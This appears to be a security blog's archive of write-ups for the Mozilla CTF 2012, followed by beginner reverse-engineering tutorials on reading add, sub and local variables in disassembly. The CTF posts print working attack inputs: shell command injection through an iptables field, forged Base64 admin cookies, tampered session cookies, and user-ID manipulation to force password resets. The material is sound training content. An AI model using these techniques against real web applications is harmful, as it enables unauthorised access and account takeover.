Mozilla CTF 2012 - IP Panel

The description for this challenge:

"Exploit Mozillas IP Panel! This IP Panel is used for whitelisting IP addresses. We know that the webinterface will call a bash script that will execute an iptables command without validation. Find the flag somewhere in /home/ippanel/ and submit it!"

So it's basically an issue with input validation of a text box. The input from the text box gets passed to something like a system("iptables $input"). The only validation that occurred here was that you can't use the letter "p" and the "/" character. "p" would get switched with " - trololololol, no p allowed :p -".

I started with a valid iptables command, "-L" and used the pipe command "|". In the input field, I put "-L | ls -hal" to get a directory listing. The output was "total 14", so this indicated that the output only prints the last line of whatever was returned from the system call.

To do a complete directory listing:

-L | ls -hal | head -1 | tail -1
-L | ls -hal | head -2 | tail -1
-L | ls -hal | head -3 | tail -1
-L | ls -hal | head -4 | tail -1

and so on until "head -14".

While doing the manual directory listing, I was thinking about how to overcome the challenge of changing my directory path into /home/ippanel/ since it has p's and forward slashes. I was going to simply substitute the p's with *, as in "cd i*anel". However, when I got done with the directory listing, I noticed the flag was already in the current working directory named "th15-15_th3_fl4g.txt".


Just cat the file and we're done:
"-L | cat th15-15_th3_fl4g.txt"
returns:
i1gALKeMunqCcyeVMud7TCbI

Mozilla CTF 2012 - 3 - Spark - Things long forgotten / 4 - Spark - Interesting Lineage / Kraken

This challenge was the first of 9 challenges based off the Spark site that Mozilla had up for awhile. I figured that I would role these two into one just to keep it simple since these ones were pretty strait forward.


For the first one you needed to create an account with the spark site. Once you did this all that you needed to do was "boost your spark" by following the instructions that went from your location to boost and directed you to the flag page.

Once you added this minus the quotes you snag some more points.

You can also from another registered account boost your account and snag you request and keep resubmitting to get you name on the board.

OST /en-US/m/boost2_confirm HTTP/1.1
Host: ocean.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ocean.mozillactf.org/en-US/home
Content-Length: 77
Cookie: csrftoken=d0d01d47dc3e20835703eaf0c82d0a16; sessionid=a78c616fcd3d2889899098731f20ab9e; parent=qqcrew
DNT: 1
Pragma: no-cache
Cache-Control: no-cache

csrfmiddlewaretoken=d0d01d47dc3e20835703eaf0c82d0a16&no_parent=&parent=qqcrew

Next....

The next piece ties into "bringing down the Kraken" but I digress. If you continue to browse the spark site you will eventually notice that you have a username listed in the urls as:

/en-US/users/717163726577

 So what is the "717163726577" portion that you ask, well simple it just your html encoded team name.

qqcrew = qqcrew = 717163726577

Ok? so what?  Well if you happen to have browsed to the site listed above you would have gotten a page that you can reset your password that contained the flag.

<div class="section">
 <div>DEBUG USER</div>
 <div>Name: <span>qqcrew</div>
 <div>Email: <span>qq@crew.com</div>
 <div>First Name :<span></div>
 <div>Last Name :<span></div>
 <div>City Name :<span>Cape Town</div>
 <div>Reset Email Password [Disabled]</div>
 <div>Force Password Reset <a href="https://ocean.mozillactf.org/pwreset/Nx0hBEhFUGMCARRcAhQhQxEXEk8XGh8ZAlEoChYAV0cNTx0QEBguQwEMEEYXTko=">[Enabled]</a></div>
</div>
<!-- Flag ='There are so many buried treasures in the sea!' -->

Bingo ! Another flag. 

So what else is there? Well now you can mess with anyone that you want which leads to bringing down the Kraken. So taking what we know we browse to:

/en-US/users/4B72616B656E

Then we do a force reset and Bingo another one drops!

Mozilla CTF 2012 - The Fish Blog

Challenge:

The Fish Lover's Blog contains some hidden information. Find it!

Solution:

There's not a lot of explanation for this challenge. Again, we used Burp Suite Pro to intercept our web traffic to/from the challenge site. Loading the initial page we noticed the following comments in the HTML source

< !-- the files are stored at /webserver_upload_3043493/ctf/hidden_files/ -->
< !-- BUGBUG: make sure permissions on directories and files are correct -->

Hmmm... Loading up http://challenge13.mozillactf.org/webserver_upload_30439/ctf/hidden_files/" results gives us a 403 Forbidden. So we know the directory exists, but we still don't know where the flag is. There's a shockwave object embedded into the page displaying a fish animation, but that is just a red herring (bad pun).

Well, it's a low-point challenge. Maybe we could just guess the name of the flag file?

GET /webserver_upload_3043493/ctf/hidden_files/flag HTTP/1.1

HTTP/1.1 404 Not Found

No luck.

GET /webserver_upload_3043493/ctf/hidden_files/flag.php HTTP/1.1

HTTP/1.1 404 Not Found

Still no love.

GET /webserver_upload_3043493/ctf/hidden_files/flag.txt HTTP/1.1

HTTP/1.1 200 OK


youJustGotTheFlagDudeCongrats

Woot! Another 50 points...

Mozilla CTF 2012 - Joe's Fish Shop

Challenge:

Go, get some tasty dinner over at Joe's Fish Shop! If you know how to play the admin, you'll get free desert! :)

Solution:

This is the first challenge we solved.  We used Burp Suite Pro to intercept
all our traffic to/from the challenge web site.  Loading the initial page
for challenge 12, we captured the following HTTP headers in the response:

HTTP/1.0 200 OK
Date: Wed, 25 Jan 2012 13:06:49 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.9 with Suhosin-Patch
X-Powered-By: PHP/5.3.9
Content-Length: 1659
Content-Type: text/html
Set-Cookie: Role=bm9uX2FkbWlu
Set-Cookie: ID=current_user
Set-Cookie: _tmp=d0f0elfe
Set-Cookie: access=none
Connection: close

Notice the server is setting a cookie named Role to an alphanumeric value.
Base64 encoded data is also alphanumeric.  We sent the value of the Role
cookie to the Decoder tab in BSP, selected Decode as Base64 and saw this:

non_admin

That's interesting.  We used BSP's Decoder tab to Base64 encode the string
admin, and copied the result (YWRtaW4=) to the clipboard.

We then reloaded the challenge page, caught the request in BSP's Intercept
tab, and changed the value of the Role cookie to YWRtaW4=.  The modified
Cookie header looked like:

Cookie: Role=YWRtaW4=; ID=current_user; _tmp=d0f0elfe; access=none

After forwarding the modified request on to the server, we received the flag:

Welcome Administrator.  Please take your flag:  x0sld0ef0d

Mozilla CTF 2012 - Fishr - Fish your messages out of the sea (500)

Challenge 19 was the first that I began to work on.

19 - Fishr - Fish your messages out of the sea
Please log in to Fishr using the name 0wn and the password pwnthis.
The flag is on fl4gdud3's wall, get it.
gold: 500 +3 (1st), +2 (2nd), +1 (3rd)

This challenge was worth the largest of the challenges and thought it would be a good starting point.


The game play was strait forward that the flag was on Fl4gdud3's wall. For this I chose to use Burpesuite for this while I was looking around.  Once logged in you can see that you have friends that you can see like twitter. As you click around you will see the "admin" is following  and the others that are following admin which happens to be "flagdud3" . This was the first piece to the puzzle now that you know the real name that you are looking for not the dude with the 4 in his name.

Upon trying to browse to "flagdud3's" page you get an:

Sorry, but there are no visible Posts. This user might have set his wall to private and you lack the permission to read private wall messages.

Now you know that you need to find a way to get to this wall as a different user. Lets turn to burpe and look at the request.

GET /ajax.php?p=wall&arg=flagdud3 HTTP/1.1
Host: challenge19.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: https://challenge19.mozillactf.org/index.php
Cookie: data=7%3A0wn%3A0wn%2540spam.com; mac=eccc50cafdb69aac25dba7738651ddff
DNT: 1
Connection: keep-alive

 The cookie is the key and you can see that your username is in it.

7%3A0wn%3A0wn%2540spam.com;

So if you send this request to repeater and alter the request to be "flagdud3" and looks like:

7%3Aflagdud3%3Aflagdud3%2540spam.com;

you will get the response that you are looking for:

  Kickin' in the front seat - sittin' in the back seat...
    <span class="time">- posted at 27.12.2011 16:32</span>
  </div>
  <div class="post">
    <b>flagdud3:</b>
    Flag: s0ci4lly4wkw4rd
    <span class="time">- posted at 26.12.2011 12:46</span>

 And there you have it 500 points

Mozilla CTF team qq_crew

The Mozilla CTF is over now and team qq_crew ended the day in 24th place http://www.mozillactf.org/scoreboard.php . Lots of good times where had we would like to thank freddy and the whole crew that put this on http://www.mozillactf.org/credits.php . It was a blast thanks guys. We will be posting our methods for the challenges we solved in the coming days.

New researcher added to the crew

Allow me to welcome a new member to our 5x5sec crew vulp1n3. He is a talented security professional that jbc22 and I enjoying working with and look forward to tons of knowledge.  ---welcome aboard vulp1n3

Binary Auditing part 6, Identifying the + Operator

This one is a quicky, as it's awfully close to exercise A05. We're taking a look at the "add" instruction now.

Take a look at the assembly, you'll see four add operations in the function. But what do the four do?

At 00401009, we are adding var_4 to var_8 and putting it into eax.

At 0040101E, we are adding 8 bytes onto esp to re-align it with the variables we were using beforehand.

At 00401024, the value 1 (1 in hexidecimal!) is being added to edx (which was assigned the value of Var_C).

At 00401039, we are adding 8 bytes onto esp to re-align it to return the stack to the state it was in before calling this program.

So in this tutorial, we really just looked at the add instruction, and it's differences between stack operations and variable operations. Again, it's pretty much the same as the previous "sub" tutorial.

As always, the pseudo-C code:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+4h] [bp-8h]@0
  int v5; // [sp+8h] [bp-4h]@0

  printf("%x\n", v4 + v5);
  printf("%x\n", v4 + v5 + 1);
  return 0;
}

Binary Auditing part 5, Identifying the - Operator

This exercise looks easy at first. When the "sub" operation takes place, there is going to be some subtraction occuring.

Take a look at the assembly, you'll see three sub operations in the function. But what do the three do?

At 00401003, this is directed related to the first exercise provided by binary-auditing.com (the pdf). It deals with the stack and not with local variables that we are specifically using in the program. We know this for two reasons: 1) it occurs at the beginning of a function and 2) it is acting upon esp, which is the stack pointer.

At 00401009, we are taking two variables eax (which was assigned the value of var_4 in the previous instruction) and var_8. This value is then moved into var_C and pushed onto the stack.

At 00401024, the value 10 (0A in hexidecimal) is being subtracted from edx (which was assigned the value of Var_C).

So in this tutorial, we really just looked at the sub instruction, and it's differences between stack operations and variable operations.

As always, the pseudo-C code:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+4h] [bp-8h]@0
  int v5; // [sp+8h] [bp-4h]@0

  printf("%x\n", v5 - v4);
  printf("%x\n", v5 - v4 - 10);
  return 0;
}

Binary Auditing part 4, Identifying Register Variables

Sorry this post took so long. I kinda booched my VM...

In this tutorial, we take a look at identifying register variables. This tutorial is awfully close to A03; however, it differs in that variables are not declared in the C code before passing it as an argument, leaving the computer to push values onto the stack through register variables first.

The assembly looks essential the same, though the addition operation (ie. 1911 + 1638) is acted upon the register eax instead of being passed to a new function. This is demonstrated at 00401017 (the addition) and 0040103A (the subtraction).

IDA renders the pseudo-C code as:


int __cdecl main(int argc, const char **argv, const char **envp)
{
  printf("%x + %x = %x\n", 1638, 1911, 3549);
  printf("%x - %x = %x\n", 1638, 1911, 273);
  return 0;
}

Binary Auditing part 3, Identifying Local Variables

In this tutorial, we are reviewing how to identify local variables. Local variables are variables that are defined in a function and are not accessible by other functions. In programming languages, this is defined as scoping (see: http://en.wikipedia.org/wiki/Scope_(computer_science) and http://aelinik.free.fr/c/ch14.htm).

The main function in this program starts at 00401040.

** For an additional exercise, use PEview (http://www.magma.ca/~wjr) to find the "Address of Entry Point", then follow that until you get to the main function **

After the stack prologue, we see that two numbers are being assigned to var_4 and var_8. Each are then loaded into ecx and eax, respectively, and pushed onto the stack. var_8 (a.k.a. ecx) is pushed first onto the stack, so it will be the last of the two to be popped off the stack. These two variables, now placed on the stack, are being passed to the function 00401000, which is being called.

In 00401000, you see that arg_0 and arg_4 have been passed. Next to each declaration of the varibles, you have a positive number (8 and 0Ch). Since the stack grows down, it typical operations to the stack are subtracting from the base and stack pointers (ebp and esp). Since we're utilizing a positive number, this means we are accessing areas of the stack that have been filled by previous functions, or programs.

If you're following along at home with a debugger, a quick tip is to step OVER (short cut is F8) call to _ltoa: otherwise you go into msvcr80.dll, which is a Microsoft DLL.

The last item to go over is the 'lea' instruction at 00401011 and 00401022 as we haven't encountered this before. LEA stands for Load Effective Address and is mostly used with pointers. With pointers, we are dealing with the addresses of variables, instead of the value of the variable. (Further reading: http://www.cprogramming.com/tutorial/lesson6.html and http://stackoverflow.com/questions/1658294/x86-asm-whats-the-purpose-of-the-lea-instruction).

Our code for this program looks roughly like this:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+0h] [bp-Ch]@1
  int v5; // [sp+4h] [bp-8h]@1
  int v6; // [sp+8h] [bp-4h]@1

  v6 = 1638;
  v5 = 1911;
  v4 = sub_401000(v6, v5);
  printf("%x\n", &v4);
  return 0;
}


int __cdecl sub_401000(int a1, int a2)
{
  char DstBuf; // [sp+4h] [bp-34h]@1

  ltoa(a2 + a1, &DstBuf, 16);
  printf("%x == %s == ", a2 + a1, &DstBuf);
  return a2 + a1;
}